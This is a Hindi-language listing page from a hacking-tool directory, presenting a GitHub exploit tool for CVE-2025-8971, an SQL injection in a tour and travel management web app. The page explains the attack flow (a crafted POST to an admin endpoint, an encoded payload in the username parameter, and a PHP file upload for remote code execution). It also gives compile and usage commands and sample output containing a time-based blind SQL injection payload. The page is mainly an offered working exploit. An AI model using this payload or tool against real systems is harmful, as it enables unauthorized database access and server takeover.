Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/bytereaper77/cve-2025-8971
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगArchived
GitHubbytereaper77/cve-2025-8971

CVE-2025-8971

itsourcecode के ऑनलाइन टूर और ट्रैवल मैनेजमेंट सिस्टम 1.0 में SQL इंजेक्शन

रिपॉजिटरी देखें
121 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-8971 (SQL इंजेक्शन)

लेखक: Byte Reaper

विवरण :

यह एक्सप्लॉइट CVE-2025-8971 के लिए है, जो itsourcecode ऑनलाइन टूर और ट्रैवल मैनेजमेंट सिस्टम 1.0 में एक SQL इंजेक्शन भेद्यता है। यह भेद्यता /admin/operations/travellers.php में मौजूद है और इसे val-username पैरामीटर के माध्यम से दूर से शोषित किया जा सकता है।

यह कैसे काम करता है

एक्सप्लॉइट लक्ष्य URL पर तैयार HTTP POST अनुरोध भेजता है।

पेलोड को एन्कोड करके val-username में इंजेक्ट किया जाता है।

वैकल्पिक फ़ाइल अपलोड (.php या छवि) का उपयोग करके दूरस्थ कोड निष्पादन प्राप्त किया जा सकता है।

स्क्रिप्ट यह सत्यापित करने के लिए प्रतिक्रियाओं की जाँच करता है कि पेलोड सफलतापूर्वक निष्पादित हुआ या नहीं।

आवश्यकताएँ :

root@kitploit:~
GCC कंपाइलर (gcc)

Linux x86_64 

ibcurl 

संकलन :

root@kitploit:~
    gcc script.c argparse.c -o CVE-2025-8971 -lcurl
    ./CVE-2025-8971 -u http://<target> -v [verbose mode]

उपयोग:

root@kitploit:~
    -h, --help            सहायता संदेश
    -u, --url             लक्ष्य URL (बेस URL)
    -c, --cookies         फ़ाइल कुकीज़
    -i, --ip              नकली IP (होस्ट अनुरोध)
    -f, --file            फ़ाइल अपलोड (.php / छवि)
    -v, --verbose         वर्बोज़ मोड

उदाहरण रन :

root@kitploit:~
[+] Start encode Payload in Request (username=)
[+] Encode Payload : AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(5)))bAKL)%20AND%20'b'='b'
[+] Original Payload (Not encode) : AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'b'='b'
[+] POST Request Sent
[+] FULL URL : http://127.0.0.1/code/admin/operations/travellers.php
[+] File Upload : test.php
[+] File written successfully
....

लाइसेंस :

MIT लाइसेंस

टूल डाउनलोड करें